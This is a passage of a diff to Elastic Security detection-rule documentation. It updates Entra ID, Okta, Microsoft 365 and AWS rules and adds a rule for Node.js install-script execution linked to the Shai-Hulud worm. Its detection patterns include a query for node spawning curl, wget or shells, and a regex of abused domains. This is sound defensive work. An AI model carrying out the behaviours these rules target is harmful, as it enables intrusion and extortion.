+ +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=5m +[any where event.dataset == "azure.identity_protection"] by azure.identityprotection.properties.user_principal_name +[any where event.dataset == "azure.auditlogs" and event.action == "Register device"] by azure.auditlogs.properties.initiated_by.user.userPrincipalName + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Device Registration +** ID: T1098.005 +** Reference URL: https://attack.mitre.org/techniques/T1098/005/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc index d0dbb4980e..4ff74ea894 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc @@ -35,7 +35,7 @@ Identifies rare instances of authentication requirements for Azure Entra ID prin * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -154,3 +154,11 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" ** Name: Password Spraying ** ID: T1110.003 ** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-sign-in-brute-force-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-sign-in-brute-force-activity.asciidoc index fa8d471576..374965345e 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-sign-in-brute-force-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-sign-in-brute-force-activity.asciidoc @@ -41,7 +41,7 @@ Identifies potential brute-force attacks targeting user accounts by analyzing fa * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -104,7 +104,7 @@ This rule detects brute-force authentication activity in Entra ID sign-in logs. 
[source, js] ---------------------------------- -from logs-azure.signinlogs* +from logs-azure.signinlogs-* // Define a time window for grouping and maintain the original event timestamp | eval Esql.time_window_date_trunc = date_trunc(15 minutes, @timestamp) diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-user-reported-suspicious-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-user-reported-suspicious-activity.asciidoc index a714d569c5..c6493a0611 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-user-reported-suspicious-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-user-reported-suspicious-activity.asciidoc @@ -34,7 +34,7 @@ Identifies suspicious activity reported by users in Microsoft Entra ID where use * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -117,3 +117,7 @@ event.dataset: "azure.auditlogs" ** Name: Valid Accounts ** ID: T1078 ** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-graph-first-occurrence-of-client-request.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-graph-first-occurrence-of-client-request.asciidoc index e704531143..44f6587962 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-graph-first-occurrence-of-client-request.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-graph-first-occurrence-of-client-request.asciidoc @@ -33,7 +33,7 @@ This New Terms rule focuses on the first occurrence of a client application ID ( * Use Case: Identity and Access Audit * Tactic: Initial Access -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -123,3 +123,11 @@ event.dataset: "azure.graphactivitylogs" ** Name: Cloud Accounts ** ID: T1078.004 ** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/rule-details/multiple-device-token-hashes-for-single-okta-session.asciidoc b/docs/detections/prebuilt-rules/rule-details/multiple-device-token-hashes-for-single-okta-session.asciidoc index 9911ef4e2a..01cb51e54d 100644 --- a/docs/detections/prebuilt-rules/rule-details/multiple-device-token-hashes-for-single-okta-session.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/multiple-device-token-hashes-for-single-okta-session.asciidoc @@ -35,7 +35,7 @@ This rule detects when a specific Okta actor has multiple device token hashes fo * Domain: SaaS * Resources: Investigation Guide -*Version*: 307 +*Version*: 308 *Rule authors*: @@ -117,7 +117,7 @@ from logs-okta* "user.authentication.sso" ) and okta.actor.alternate_id != "system@okta.com" and - okta.actor.alternate_id rlike "[^@\s]+\@[^@\s]+" and + okta.actor.alternate_id rlike "[^@\\s]+\\@[^@\\s]+" and okta.authentication_context.external_session_id != "unknown" | keep event.action, diff --git a/docs/detections/prebuilt-rules/rule-details/multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc 
b/docs/detections/prebuilt-rules/rule-details/multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc index 045e9b120a..3388c68979 100644 --- a/docs/detections/prebuilt-rules/rule-details/multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc @@ -11,7 +11,7 @@ Detects a burst of Microsoft 365 user account lockouts within a short 5-minute w *Risk score*: 47 -*Runs every*: 5m +*Runs every*: 8m *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) @@ -36,7 +36,7 @@ Detects a burst of Microsoft 365 user account lockouts within a short 5-minute w * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -160,3 +160,15 @@ from logs-o365.audit-* ** Name: Brute Force ** ID: T1110 ** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-client-address.asciidoc b/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-client-address.asciidoc index 879bb06b5b..8d01203934 100644 --- a/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-client-address.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-client-address.asciidoc @@ -34,7 +34,7 @@ Detects when a certain threshold of Okta user authentication events are reported * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 206 +*Version*: 207 *Rule authors*: @@ -118,7 +118,7 @@ The Okta Fleet integration, Filebeat module, or similarly structured data is req from logs-okta* | where event.dataset == "okta.system" and - (event.action == "user.session.start" or event.action rlike "user\.authentication(.*)") and + (event.action == "user.session.start" or event.action like "user.authentication.*") and okta.outcome.reason == "INVALID_CREDENTIALS" | keep okta.client.ip, diff --git a/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc b/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc index e5feeb913c..fca1a226d0 100644 --- a/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc @@ -34,7 +34,7 @@ Detects when a high number of Okta user authentication events are reported for m * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 206 +*Version*: 207 *Rule authors*: @@ -115,7 +115,7 @@ The Okta Fleet integration, Filebeat module, or similarly structured data is req from logs-okta* | where event.dataset == "okta.system" and - (event.action rlike "user\.authentication(.*)" or event.action == "user.session.start") and + 
(event.action like "user.authentication.*" or event.action == "user.session.start") and okta.debug_context.debug_data.dt_hash != "-" and okta.outcome.reason == "INVALID_CREDENTIALS" | keep diff --git a/docs/detections/prebuilt-rules/rule-details/network-activity-to-a-suspicious-top-level-domain.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-activity-to-a-suspicious-top-level-domain.asciidoc index 750558e55a..91e87f5c8f 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-activity-to-a-suspicious-top-level-domain.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/network-activity-to-a-suspicious-top-level-domain.asciidoc @@ -42,7 +42,7 @@ Identifies DNS queries to commonly abused Top Level Domains by common LOLBINs or * Data Source: Crowdstrike * Data Source: Sysmon -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -106,7 +106,7 @@ network where host.os.type == "windows" and dns.question.name != null and "java.exe", "javaw.exe", "*.pif", "*.com", "*.scr") or (?process.code_signature.trusted == false or ?process.code_signature.exists == false) or ?process.code_signature.subject_name : ("AutoIt Consulting Ltd", "OpenJS Foundation", "Python Software Foundation") or - process.executable : ("?:\\Users\\*.exe", "?:\\ProgramData\\*.exe") + ?process.executable : ("?:\\Users\\*.exe", "?:\\ProgramData\\*.exe") ) and dns.question.name regex """.*\.(top|buzz|xyz|rest|ml|cf|gq|ga|onion|monster|cyou|quest|cc|bar|cfd|click|cam|surf|tk|shop|club|icu|pw|ws|online|fun|life|boats|store|hair|skin|motorcycles|christmas|lol|makeup|mom|bond|beauty|biz|live|work|zip|country|accountant|date|party|science|loan|win|men|faith|review|racing|download|host)""" diff --git a/docs/detections/prebuilt-rules/rule-details/new-or-modified-federation-domain.asciidoc b/docs/detections/prebuilt-rules/rule-details/new-or-modified-federation-domain.asciidoc index 0ef8b0f5a0..e8fb7d4acf 100644 --- a/docs/detections/prebuilt-rules/rule-details/new-or-modified-federation-domain.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/new-or-modified-federation-domain.asciidoc @@ -7,8 +7,8 @@ Identifies a new or modified federation domain, which can be used to create a tr *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: low @@ -37,7 +37,7 @@ Identifies a new or modified federation domain, which can be used to create a tr * Tactic: Privilege Escalation * Resources: Investigation Guide -*Version*: 210 +*Version*: 211 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/node-js-pre-or-post-install-script-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/node-js-pre-or-post-install-script-execution.asciidoc new file mode 100644 index 0000000000..abf471168a --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/node-js-pre-or-post-install-script-execution.asciidoc @@ -0,0 +1,123 @@ +[[node-js-pre-or-post-install-script-execution]] +=== Node.js Pre or Post-Install Script Execution + +This rule detects the execution of Node.js pre or post-install scripts. These scripts are executed by the Node.js package manager (npm) during the installation of packages. Adversaries may abuse this technique to execute arbitrary commands on the system and establish persistence. This activity was observed in the wild as part of the Shai-Hulud worm. 
+ +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
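+
+As a complement to the rule query below, suspicious children spawned by `node` during package installation can be reviewed directly. The following ES|QL search is an illustrative sketch only, not part of the prebuilt rule: the index pattern, the list of child process names, and the result limit are assumptions that should be adapted to your environment.
+
+[source, js]
+----------------------------------
+// Hypothetical hunt: shells and download utilities spawned by node,
+// which is how pre/post-install scripts typically execute payloads
+from logs-endpoint.events.process*
+| where host.os.type == "linux"
+  and event.action == "exec"
+  and process.parent.name == "node"
+  and process.name in ("sh", "bash", "dash", "curl", "wget", "python3")
+| keep @timestamp, host.name, user.name, process.parent.command_line, process.command_line, process.working_directory
+| sort @timestamp desc
+| limit 250
+----------------------------------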
+ + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=10s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "node" and process.args == "install"] by process.entity_id + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node"] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ diff --git a/docs/detections/prebuilt-rules/rule-details/o365-email-reported-by-user-as-malware-or-phish.asciidoc b/docs/detections/prebuilt-rules/rule-details/o365-email-reported-by-user-as-malware-or-phish.asciidoc index a6a494634d..0e7d58f0ba 100644 --- a/docs/detections/prebuilt-rules/rule-details/o365-email-reported-by-user-as-malware-or-phish.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/o365-email-reported-by-user-as-malware-or-phish.asciidoc @@ -7,8 +7,8 @@ Detects the occurrence of emails reported as Phishing or Malware by Users. Secur *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Detects the occurrence of emails reported as Phishing or Malware by Users. Secur *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -31,7 +31,7 @@ Detects the occurrence of emails reported as Phishing or Malware by Users. Secur * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/o365-excessive-single-sign-on-logon-errors.asciidoc b/docs/detections/prebuilt-rules/rule-details/o365-excessive-single-sign-on-logon-errors.asciidoc index e427090865..1bd89d2f0d 100644 --- a/docs/detections/prebuilt-rules/rule-details/o365-excessive-single-sign-on-logon-errors.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/o365-excessive-single-sign-on-logon-errors.asciidoc @@ -7,8 +7,8 @@ Identifies accounts with a high number of single sign-on (SSO) logon errors. Exc *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: high @@ -16,7 +16,7 @@ Identifies accounts with a high number of single sign-on (SSO) logon errors. 
Exc *Runs every*: 5m -*Searches indices from*: now-20m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,7 +30,7 @@ Identifies accounts with a high number of single sign-on (SSO) logon errors. Exc * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 210 +*Version*: 211 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/o365-mailbox-audit-logging-bypass.asciidoc b/docs/detections/prebuilt-rules/rule-details/o365-mailbox-audit-logging-bypass.asciidoc index 07ddad4afd..c94e232d5d 100644 --- a/docs/detections/prebuilt-rules/rule-details/o365-mailbox-audit-logging-bypass.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/o365-mailbox-audit-logging-bypass.asciidoc @@ -7,8 +7,8 @@ Detects the occurrence of mailbox audit bypass associations. The mailbox audit i *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Detects the occurrence of mailbox audit bypass associations. The mailbox audit i *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Detects the occurrence of mailbox audit bypass associations. The mailbox audit i * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -118,3 +118,7 @@ event.dataset:o365.audit and event.provider:Exchange and event.action:Set-Mailbo ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/oidc-discovery-url-changed-in-entra-id.asciidoc b/docs/detections/prebuilt-rules/rule-details/oidc-discovery-url-changed-in-entra-id.asciidoc index 0e5d4d3a47..4beb8117db 100644 --- a/docs/detections/prebuilt-rules/rule-details/oidc-discovery-url-changed-in-entra-id.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/oidc-discovery-url-changed-in-entra-id.asciidoc @@ -11,7 +11,7 @@ Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Auth *Risk score*: 73 -*Runs every*: 5m +*Runs every*: 8m *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) @@ -32,7 +32,7 @@ Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Auth * Tactic: Persistence * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/okta-user-sessions-started-from-different-geolocations.asciidoc b/docs/detections/prebuilt-rules/rule-details/okta-user-sessions-started-from-different-geolocations.asciidoc index c0b09ee704..c97f107bbc 100644 --- a/docs/detections/prebuilt-rules/rule-details/okta-user-sessions-started-from-different-geolocations.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/okta-user-sessions-started-from-different-geolocations.asciidoc @@ -34,7 +34,7 @@ Detects when a specific Okta actor has multiple sessions started from different * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 307 +*Version*: 308 *Rule 
authors*: @@ -109,7 +109,7 @@ The Okta Fleet integration, Filebeat module, or similarly structured data is req from logs-okta* | where event.dataset == "okta.system" and - (event.action rlike "user\.authentication(.*)" or event.action == "user.session.start") and + (event.action like "user.authentication.*" or event.action == "user.session.start") and okta.security_context.is_proxy != true and okta.actor.id != "unknown" and event.outcome == "success" diff --git a/docs/detections/prebuilt-rules/rule-details/onedrive-malware-file-upload.asciidoc b/docs/detections/prebuilt-rules/rule-details/onedrive-malware-file-upload.asciidoc index 70653f5213..bad5ff3623 100644 --- a/docs/detections/prebuilt-rules/rule-details/onedrive-malware-file-upload.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/onedrive-malware-file-upload.asciidoc @@ -7,8 +7,8 @@ Identifies the occurence of files uploaded to OneDrive being detected as Malware *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: high @@ -16,7 +16,7 @@ Identifies the occurence of files uploaded to OneDrive being detected as Malware *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -31,7 +31,7 @@ Identifies the occurence of files uploaded to OneDrive being detected as Malware * Tactic: Lateral Movement * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -114,3 +114,15 @@ event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFi ** Name: Taint Shared Content ** ID: T1080 ** Reference URL: https://attack.mitre.org/techniques/T1080/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ +* Sub-technique: +** Name: Upload Malware +** ID: T1608.001 +** Reference URL: https://attack.mitre.org/techniques/T1608/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc index 761a96214c..3516e330ff 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc @@ -1,11 +1,14 @@ [[potential-aws-s3-bucket-ransomware-note-uploaded]] === Potential AWS S3 Bucket Ransomware Note Uploaded -Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the `PutObject` S3 API call with a common ransomware note file extension such as `.ransom`, or `.lock`. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. +Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the PutObject S3 API call with a common ransomware note file name or extension such as ransom or .lock. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. 
-*Rule type*: esql +*Rule type*: eql -*Rule indices*: None +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* *Severity*: medium @@ -13,13 +16,12 @@ Identifies potential ransomware note being uploaded to an AWS S3 bucket. This ru *Runs every*: 5m -*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 *References*: -* https://s3.amazonaws.com/bizzabo.file.upload/PtZzA0eFQwV2RA5ysNeo_ERMETIC%20REPORT%20-%20AWS%20S3%20Ransomware%20Exposure%20in%20the%20Wild.pdf * https://stratus-red-team.cloud/attack-techniques/AWS/aws.impact.s3-ransomware-batch-deletion/ * https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/ @@ -33,7 +35,7 @@ Identifies potential ransomware note being uploaded to an AWS S3 bucket. This ru * Tactic: Impact * Resources: Investigation Guide -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -49,95 +51,95 @@ Identifies potential ransomware note being uploaded to an AWS S3 bucket. This ru *Triage and analysis* +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + *Investigating Potential AWS S3 Bucket Ransomware Note Uploaded* -This rule detects the `PutObject` S3 API call with a common ransomware note file extension such as `.ransom`, or `.lock`. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. +This rule detects a successful `PutObject` to S3 where the object key matches common ransomware-note patterns (for example, `readme`, `how_to_decrypt`, `decrypt_instructions`, `ransom`, `lock`). Attackers who obtain credentials or abuse overly-permissive bucket policies can upload ransom notes (often after deleting or encrypting data). *Possible Investigation Steps:* - -- **Identify the Actor**: Review the `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` fields to identify who performed the action. Verify if this actor typically performs such actions and if they have the necessary permissions. -- **Review the Request Details**: Examine the `aws.cloudtrail.request_parameters` to understand the specific details of the `PutObject` action. Look for any unusual parameters that could suggest unauthorized or malicious modifications. -- **Analyze the Source of the Request**: Investigate the `source.ip` and `source.geo` fields to determine the geographical origin of the request. An external or unexpected location might indicate compromised credentials or unauthorized access. -- **Contextualize with Timestamp**: Use the `@timestamp` field to check when the ransom note was uploaded. Changes during non-business hours or outside regular maintenance windows might require further scrutiny. -- **Inspect the Ransom Note**: Review the `aws.cloudtrail.request_parameters` for the `PutObject` action to identify the characteristics of the uploaded ransom note. Look for common ransomware file extensions such as `.txt`, `.note`, `.ransom`, or `.html`. 
-- **Correlate with Other Activities**: Search for related CloudTrail events before and after this action to see if the same actor or IP address engaged in other potentially suspicious activities. -- **Check for Object Deletion or Access**: Look for `DeleteObject`, `DeleteObjects`, or `GetObject` API calls to the same S3 bucket that may indicate the adversary accessing and destroying objects before placing the ransom note. +- **Confirm the actor and session details.** Review `aws.cloudtrail.user_identity.*` (ARN, type, access key, session context), `source.ip`, `user.agent`, and `tls.client.server_name` to identify *who* performed the upload and *from where*. Validate whether this principal typically writes to this bucket. +- **Inspect the object key and bucket context.** From `aws.cloudtrail.request_parameters`, capture the exact `key` and `bucketName`. Check whether the key is publicly readable (ACL), whether the bucket is internet-exposed, and whether replication or lifecycle rules could propagate or remove related objects. +- **Pivot to related S3 activity around the same time.** Look for `DeleteObject`/`DeleteObjects`, mass `PutObject` spikes, `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, and `PutBucketLifecycleConfiguration` events on the same bucket or by the same actor to determine if data destruction, policy tampering, or guard-rail changes occurred. +- **Assess blast radius across the account.** Search recent CloudTrail for the same actor/IP touching other buckets, KMS keys used by those buckets, and IAM changes (new access keys, policy attachments, role assumptions) that could indicate broader compromise paths consistent with ransomware playbooks. +- **Check protections and recovery posture on the bucket.** Verify whether S3 Versioning and (if in use) Object Lock legal hold are enabled; note prior versions available for the affected key, and whether lifecycle rules might expire them. +- **Correlate with threat signals.** Review other related alerts, GuardDuty S3-related findings, AWS Config drift on the bucket and its policy, and any SOAR/IR runbook executions tied to ransomware triage. *False Positive Analysis:* - -- **Legitimate Administrative Actions**: Confirm if the `PutObject` action aligns with scheduled updates, maintenance activities, or legitimate administrative tasks documented in change management systems. -- **Consistency Check**: Compare the action against historical data of similar activities performed by the user or within the organization. If the action is consistent with past legitimate activities, it might indicate a false alarm. -- **Verify through Outcomes**: Check the `aws.cloudtrail.response_elements` and the `event.outcome` to confirm if the upload was successful and intended according to policy. +- **Planned tests or red-team exercises.** Confirm change tickets or test windows for staging/dev buckets; red teams often drop “ransom-note-like” files during exercises. +- **Benign automation naming.** Some data-migration or backup tools may use “readme”/“recovery”-style filenames; validate by `user.agent`, principal, and target environment (dev vs prod). +- **Log/archive buckets.** Exclude infrastructure/logging buckets (for example, `AWSLogs`, CloudTrail, access logs) per rule guidance to reduce noise. *Response and Remediation:* -- **Immediate Review and Reversal if Necessary**: If the activity was unauthorized, remove the uploaded ransom notes from the S3 bucket and review the bucket's access logs for any suspicious activity. 
